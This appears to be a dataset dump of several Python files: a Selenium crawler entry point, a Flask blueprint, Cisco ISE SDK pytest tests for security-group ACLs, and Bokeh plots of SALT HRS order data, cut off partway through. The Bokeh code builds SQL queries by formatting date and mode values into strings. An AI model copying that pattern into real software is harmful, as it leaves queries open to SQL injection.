[
"MIT"
] | null | null | null |
dagr_selenium/crawl_watchlist.py
|
phillmac/dagr_selenium
|
b7417a878fe4c171625a40e746113ae2c0222335
|
[
"MIT"
] | 1 |
2021-12-14T06:05:26.000Z
|
2021-12-14T06:05:26.000Z
|
dagr_selenium/crawl_watchlist.py
|
phillmac/dagr_selenium
|
b7417a878fe4c171625a40e746113ae2c0222335
|
[
"MIT"
] | null | null | null |
from .functions import monitor_watchlist_action, manager
with manager.get_dagr():
monitor_watchlist_action()
| 23.6 | 57 | 0.788136 | 14 | 118 | 6.285714 | 0.714286 | 0.363636 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144068 | 118 | 4 | 58 | 29.5 | 0.871287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
4c26e9b14a57dad62c0722a56d9cd088844722fb
| 97 |
py
|
Python
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 3 |
2019-03-11T04:30:06.000Z
|
2020-01-26T03:21:52.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 23 |
2019-02-06T20:37:37.000Z
|
2020-06-01T07:08:35.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | null | null | null |
from flask import Blueprint
home_bp = Blueprint('home', __name__)
from . import views # noqa
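# Illustrative only: the usual way to attach this blueprint to an application.
# The url_prefix is an assumption on the caller's part, not something this
# package mandates.
def _register_home_blueprint(app):
    app.register_blueprint(home_bp, url_prefix='/')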
| 13.857143 | 37 | 0.731959 | 13 | 97 | 5.076923 | 0.692308 | 0.393939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185567 | 97 | 6 | 38 | 16.166667 | 0.835443 | 0.041237 | 0 | 0 | 0 | 0 | 0.043956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 |
0
| 6 |
4c405ed31ecc4361eadac459e688c3b9b4ba7bba
| 225 |
py
|
Python
|
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| 37.5 | 52 | 0.888889 | 26 | 225 | 7.461538 | 0.576923 | 0.231959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 225 | 5 | 53 | 45 | 0.946341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
4c4972e50ba94dc3591b0fc9fac43e37a601a455
| 25 |
py
|
Python
|
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | 2 |
2022-02-11T04:39:21.000Z
|
2022-02-12T15:50:35.000Z
|
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | null | null | null |
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | null | null | null |
from .main import Matrix
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
4c6a77a19021a586afe308be8abcbb50f2c090fd
| 26 |
py
|
Python
|
projects/django-filer/test.py
|
fleimgruber/python
|
2e735762c73651cffc027ca850b2a58d87d54b49
|
[
"Unlicense"
] | 25 |
2021-10-30T19:54:59.000Z
|
2022-03-29T06:11:02.000Z
|
projects/django-filer/test.py
|
fleimgruber/python
|
2e735762c73651cffc027ca850b2a58d87d54b49
|
[
"Unlicense"
] | 21 |
2021-10-19T01:09:38.000Z
|
2022-03-24T16:08:53.000Z
|
projects/django-filer/test.py
|
fleimgruber/python
|
2e735762c73651cffc027ca850b2a58d87d54b49
|
[
"Unlicense"
] | 3 |
2022-01-25T20:25:13.000Z
|
2022-03-08T02:58:50.000Z
|
import filer
import tests
| 8.666667 | 12 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 2 | 13 | 13 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d5deac526ab7e57ca5c90998d8462e6ef3d52eff
| 350 |
py
|
Python
|
tw2/jit/widgets/__init__.py
|
toscawidgets/tw2.jit
|
c5e8059975115385f225029ba5c7380673524122
|
[
"MIT"
] | 1 |
2020-01-12T05:11:24.000Z
|
2020-01-12T05:11:24.000Z
|
tw2/jit/widgets/__init__.py
|
toscawidgets/tw2.jit
|
c5e8059975115385f225029ba5c7380673524122
|
[
"MIT"
] | null | null | null |
tw2/jit/widgets/__init__.py
|
toscawidgets/tw2.jit
|
c5e8059975115385f225029ba5c7380673524122
|
[
"MIT"
] | null | null | null |
from tw2.jit.widgets.chart import (AreaChart, BarChart, PieChart)
from tw2.jit.widgets.graph import (ForceDirectedGraph, RadialGraph)
from tw2.jit.widgets.tree import (SpaceTree, HyperTree, Sunburst,
Icicle, TreeMap)
from tw2.jit.widgets.ajax import AjaxRadialGraph
from tw2.jit.widgets.sqla import SQLARadialGraph
| 43.75 | 67 | 0.742857 | 42 | 350 | 6.190476 | 0.52381 | 0.134615 | 0.192308 | 0.326923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017361 | 0.177143 | 350 | 7 | 68 | 50 | 0.885417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d5f5577604a264eefbdbdf102a315e607e68f2da
| 15,156 |
py
|
Python
|
tests/api/v3_1_0/test_security_groups_acls.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 36 |
2021-05-18T16:24:19.000Z
|
2022-03-05T13:44:41.000Z
|
tests/api/v3_1_0/test_security_groups_acls.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 15 |
2021-06-08T19:03:37.000Z
|
2022-02-25T14:47:33.000Z
|
tests/api/v3_1_0/test_security_groups_acls.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 6 |
2021-06-10T09:32:01.000Z
|
2022-01-12T08:34:39.000Z
|
# -*- coding: utf-8 -*-
"""IdentityServicesEngineAPI security_groups_acls API fixtures and tests.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from ciscoisesdk.exceptions import MalformedRequest
from ciscoisesdk.exceptions import ciscoisesdkException
from tests.environment import IDENTITY_SERVICES_ENGINE_VERSION
pytestmark = pytest.mark.skipif(IDENTITY_SERVICES_ENGINE_VERSION != '3.1.0', reason='version does not match')
def is_valid_get_security_groups_acl_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_a50d1bd34d5f593aadf8eb02083c67b0_v3_1_0').validate(obj.response)
return True
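# The four hasattr checks above recur verbatim in every validator below; a
# generic helper capturing that shared response shape might look like this
# (a refactoring sketch, not part of the SDK or of these generated tests).
def _has_rest_response_shape(obj):
    return all(hasattr(obj, attr)
               for attr in ('headers', 'content', 'text', 'response'))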
def get_security_groups_acl_by_id(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl_by_id(api, validator):
try:
assert is_valid_get_security_groups_acl_by_id(
validator,
get_security_groups_acl_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_security_groups_acl_by_id_default(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl_by_id_default(api, validator):
try:
assert is_valid_get_security_groups_acl_by_id(
validator,
get_security_groups_acl_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_security_groups_acl_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_afc81cd1e25c50319f75606b97c23b3d_v3_1_0').validate(obj.response)
return True
def update_security_groups_acl_by_id(api):
endpoint_result = api.security_groups_acls.update_security_groups_acl_by_id(
aclcontent='string',
active_validation=False,
description='string',
generation_id='string',
id='string',
ip_version='string',
is_read_only=True,
modelled_content={},
name='string',
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_update_security_groups_acl_by_id(api, validator):
try:
assert is_valid_update_security_groups_acl_by_id(
validator,
update_security_groups_acl_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def update_security_groups_acl_by_id_default(api):
endpoint_result = api.security_groups_acls.update_security_groups_acl_by_id(
active_validation=False,
id='string',
aclcontent=None,
description=None,
generation_id=None,
ip_version=None,
is_read_only=None,
modelled_content=None,
name=None,
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_update_security_groups_acl_by_id_default(api, validator):
try:
assert is_valid_update_security_groups_acl_by_id(
validator,
update_security_groups_acl_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_security_groups_acl_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_b0a2bea8bfec52b68663ef3f7ac6d7a7_v3_1_0').validate(obj.response)
return True
def delete_security_groups_acl_by_id(api):
endpoint_result = api.security_groups_acls.delete_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_delete_security_groups_acl_by_id(api, validator):
try:
assert is_valid_delete_security_groups_acl_by_id(
validator,
delete_security_groups_acl_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def delete_security_groups_acl_by_id_default(api):
endpoint_result = api.security_groups_acls.delete_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_delete_security_groups_acl_by_id_default(api, validator):
try:
assert is_valid_delete_security_groups_acl_by_id(
validator,
delete_security_groups_acl_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_999b22d6ad9f595ab7e3eee5cf44de8a_v3_1_0').validate(obj.response)
return True
def get_security_groups_acl(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl(
filter='value1,value2',
filter_type='string',
page=0,
size=0,
sortasc='string',
sortdsc='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl(api, validator):
try:
assert is_valid_get_security_groups_acl(
validator,
get_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl(
filter=None,
filter_type=None,
page=None,
size=None,
sortasc=None,
sortdsc=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl_default(api, validator):
try:
assert is_valid_get_security_groups_acl(
validator,
get_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_9ab61f24bdaf508590f7686e1130913f_v3_1_0').validate(obj.response)
return True
def create_security_groups_acl(api):
endpoint_result = api.security_groups_acls.create_security_groups_acl(
aclcontent='string',
active_validation=False,
description='string',
generation_id='string',
ip_version='string',
is_read_only=True,
modelled_content={},
name='string',
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_create_security_groups_acl(api, validator):
try:
assert is_valid_create_security_groups_acl(
validator,
create_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def create_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.create_security_groups_acl(
active_validation=False,
aclcontent=None,
description=None,
generation_id=None,
ip_version=None,
is_read_only=None,
modelled_content=None,
name=None,
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_create_security_groups_acl_default(api, validator):
try:
assert is_valid_create_security_groups_acl(
validator,
create_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_version(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_6704e67a1131578aa794d8377da9a1de_v3_1_0').validate(obj.response)
return True
def get_version(api):
endpoint_result = api.security_groups_acls.get_version(
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_version(api, validator):
try:
assert is_valid_get_version(
validator,
get_version(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_version_default(api):
endpoint_result = api.security_groups_acls.get_version(
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_version_default(api, validator):
try:
assert is_valid_get_version(
validator,
get_version_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_bulk_request_for_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_7da250e23ac05e6a8dcf32a81effcee9_v3_1_0').validate(obj.response)
return True
def bulk_request_for_security_groups_acl(api):
endpoint_result = api.security_groups_acls.bulk_request_for_security_groups_acl(
active_validation=False,
operation_type='string',
payload=None,
resource_media_type='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_bulk_request_for_security_groups_acl(api, validator):
try:
assert is_valid_bulk_request_for_security_groups_acl(
validator,
bulk_request_for_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def bulk_request_for_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.bulk_request_for_security_groups_acl(
active_validation=False,
operation_type=None,
payload=None,
resource_media_type=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_bulk_request_for_security_groups_acl_default(api, validator):
try:
assert is_valid_bulk_request_for_security_groups_acl(
validator,
bulk_request_for_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_monitor_bulk_status_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_07af5ee576605a5a915d888924c1e804_v3_1_0').validate(obj.response)
return True
def monitor_bulk_status_security_groups_acl(api):
endpoint_result = api.security_groups_acls.monitor_bulk_status_security_groups_acl(
bulkid='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_monitor_bulk_status_security_groups_acl(api, validator):
try:
assert is_valid_monitor_bulk_status_security_groups_acl(
validator,
monitor_bulk_status_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def monitor_bulk_status_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.monitor_bulk_status_security_groups_acl(
bulkid='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_monitor_bulk_status_security_groups_acl_default(api, validator):
try:
assert is_valid_monitor_bulk_status_security_groups_acl(
validator,
monitor_bulk_status_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
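# Usage sketch based only on the keyword arguments exercised above. The
# pagination semantics (0-based pages, an empty .response ending the loop)
# are assumptions; the tests show the accepted parameters, not the behaviour.
def _example_fetch_all_sgacls(api, page_size=100):
    results = []
    page = 0
    while True:
        response = api.security_groups_acls.get_security_groups_acl(
            page=page,
            size=page_size
        )
        if not response.response:
            break
        results.extend(response.response)
        page += 1
    return results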
| 31.509356 | 109 | 0.720375 | 1,864 | 15,156 | 5.491416 | 0.110515 | 0.150449 | 0.127882 | 0.061254 | 0.837632 | 0.831575 | 0.828351 | 0.823857 | 0.813794 | 0.795526 | 0 | 0.015608 | 0.209488 | 15,156 | 480 | 110 | 31.575 | 0.838745 | 0.076933 | 0 | 0.684492 | 0 | 0 | 0.060216 | 0.024601 | 0 | 0 | 0 | 0 | 0.128342 | 1 | 0.106952 | false | 0 | 0.013369 | 0 | 0.205882 | 0.02139 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
d5f67147c5059c64bf2090a7f0dd93d9aec0092b
| 9,842 |
py
|
Python
|
app/main/pages/instrument/hrs/red/order/plots.py
|
hettlage/salt-data-quality-site
|
da9ff4a51e8affa47e0bc1c0383c7fdeaac2155e
|
[
"MIT"
] | null | null | null |
app/main/pages/instrument/hrs/red/order/plots.py
|
hettlage/salt-data-quality-site
|
da9ff4a51e8affa47e0bc1c0383c7fdeaac2155e
|
[
"MIT"
] | null | null | null |
app/main/pages/instrument/hrs/red/order/plots.py
|
hettlage/salt-data-quality-site
|
da9ff4a51e8affa47e0bc1c0383c7fdeaac2155e
|
[
"MIT"
] | null | null | null |
import pandas as pd
from bokeh.models import HoverTool
from bokeh.models.formatters import DatetimeTickFormatter
from bokeh.palettes import Plasma256
from bokeh.plotting import figure, ColumnDataSource
from app import db
from app.decorators import data_quality
# creates your plot
date_formatter = DatetimeTickFormatter(microseconds=['%f'],
milliseconds=['%S.%2Ns'],
seconds=[':%Ss'],
minsec=[':%Mm:%Ss'],
minutes=['%H:%M:%S'],
hourmin=['%H:%M:'],
hours=["%H:%M"],
days=["%d %b"],
months=["%d %b %Y"],
years=["%b %Y"])
def get_position_source(start_date, end_date, obsmode):
logic = " and HrsMode_Id = {obsmode} " \
" and FileName like 'RORDER%%' " \
.format(obsmode=obsmode)
sql = "select Date, y_upper, HrsOrder, CONVERT(Date,char) AS Time " \
" from DQ_HrsOrder join NightInfo using (NightInfo_Id) " \
" where Date > '{start_date}' and Date <'{end_date}' {logic}" \
.format(start_date=start_date, end_date=end_date, logic=logic)
df = pd.read_sql(sql, db.engine)
colors = []
if len(df) > 0:
ord_min = df['HrsOrder'].min()
ord_max = df['HrsOrder'].max()
colors = [Plasma256[int((y - ord_min) * (len(Plasma256) - 1) / float(ord_max - ord_min))] for y in
df["HrsOrder"]]
df['colors'] = colors
source = ColumnDataSource(df)
return source
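# The colour mapping above normalises each HrsOrder value to an index on the
# Plasma256 palette. The same logic factored into a standalone sketch for
# clarity; note it requires vmax > vmin, which the caller above does not
# guarantee when every row carries the same order.
def _palette_color(value, vmin, vmax, palette=Plasma256):
    index = int((value - vmin) * (len(palette) - 1) / float(vmax - vmin))
    return palette[index]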
@data_quality(name='hrs_order', caption='HRS Order')
def hrs_order_plot(start_date, end_date):
"""Return a <div> element with the Order plot.
The plot shows the HRS order for obsmode High, low and medium over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order plot.
"""
def get_source(obsmode):
logic = " and HrsMode_Id = {obsmode} " \
" and FileName like 'RORDER%%' " \
" group by Date " \
.format(obsmode=obsmode)
sql = "select Date, (Max(HrsOrder) - Min(HrsOrder)) as ord, CONVERT(Date, char) AS Time " \
" from DQ_HrsOrder join NightInfo using (NightInfo_Id) " \
" where Date > '{start_date}' and Date <'{end_date}' {logic}" \
.format(start_date=start_date, end_date=end_date, logic=logic)
df = pd.read_sql(sql, db.engine)
source = ColumnDataSource(df)
return source
low_source = get_source(1) # HrsMode_Id = 1 low
med_source = get_source(2) # HrsMode_Id = 2 med
high_source = get_source(3) # HrsMode_Id = 3 high
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HrsOrder(Max - Min): </span>
<span style="font-size: 15px;"> @ord</span>
</div>
</div>
"""
)
p = figure(title="HRS Order",
x_axis_label='Date',
y_axis_label='Max(HrsOrder) - Min(HrsOrder)',
x_axis_type='datetime',
tools=[tool_list, _hover])
p.scatter(source=low_source, x='Date', y='ord', color='red', fill_alpha=0.2, legend='Low', size=10)
p.scatter(source=med_source, x='Date', y='ord', color='orange', fill_alpha=0.2, legend='Medium', size=10)
p.scatter(source=high_source, x='Date', y='ord', color='green', fill_alpha=0.2, legend='High', size=10)
p.legend.location = "top_right"
p.legend.click_policy = "hide"
p.legend.background_fill_alpha = 0.3
p.legend.inactive_fill_alpha = 0.8
p.xaxis[0].formatter = date_formatter
return p
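# The @data_quality decorator is expected to turn the returned figure into a
# <div>; a sketch of the standard Bokeh pattern for that conversion, shown
# for context only.
def _figure_to_components(plot):
    from bokeh.embed import components  # deferred import, sketch only
    script, div = components(plot)
    return script, div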
@data_quality(name='hrs_order_position_high', caption=' ')
def hrs_order_position_plot_high(start_date, end_date):
"""
Return a <div> element with the Order Position plot.
The plot shows the HRS order for obsmode High resolution over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order Position plot.
"""
high_source = get_position_source(start_date, end_date, 3) # HrsMode_Id = 3 high
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">Y Upper: </span>
<span style="font-size: 15px;"> @y_upper</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HRS Order: </span>
<span style="font-size: 15px;"> @HrsOrder</span>
</div>
</div>
"""
)
p = figure(title="HRS Order Position High Resolution",
x_axis_label='Date',
y_axis_label='y_upper',
x_axis_type='datetime',
tools=[tool_list, _hover])
p.scatter(source=high_source, x='Date', y='y_upper', color='colors', fill_alpha=0.2, size=10)
p.xaxis[0].formatter = date_formatter
return p
@data_quality(name='hrs_order_position_medium', caption=' ')
def hrs_order_position_plot_medium(start_date, end_date):
"""
Return a <div> element with the Order Position plot.
    The plot shows the HRS order for obsmode medium resolution over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order Position plot.
"""
    med_source = get_position_source(start_date, end_date, 2)  # HrsMode_Id = 2 medium
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">Y Upper: </span>
<span style="font-size: 15px;"> @y_upper</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HRS Order: </span>
<span style="font-size: 15px;"> @HrsOrder</span>
</div>
</div>
"""
)
p = figure(title="HRS Order Position Medium Resolution",
x_axis_label='Date',
y_axis_label='y_upper',
x_axis_type='datetime',
tools=[tool_list, _hover])
    p.scatter(source=med_source, x='Date', y='y_upper', color='colors', fill_alpha=0.2, size=10)
p.xaxis[0].formatter = date_formatter
return p
@data_quality(name='hrs_order_position_low', caption=' ')
def hrs_order_position_plot_low(start_date, end_date):
"""
Return a <div> element with the Order Position plot.
    The plot shows the HRS order for obsmode low resolution over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order Position plot.
"""
    low_source = get_position_source(start_date, end_date, 1)  # HrsMode_Id = 1 low
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">Y Upper: </span>
<span style="font-size: 15px;"> @y_upper</span>
</div>
<div>
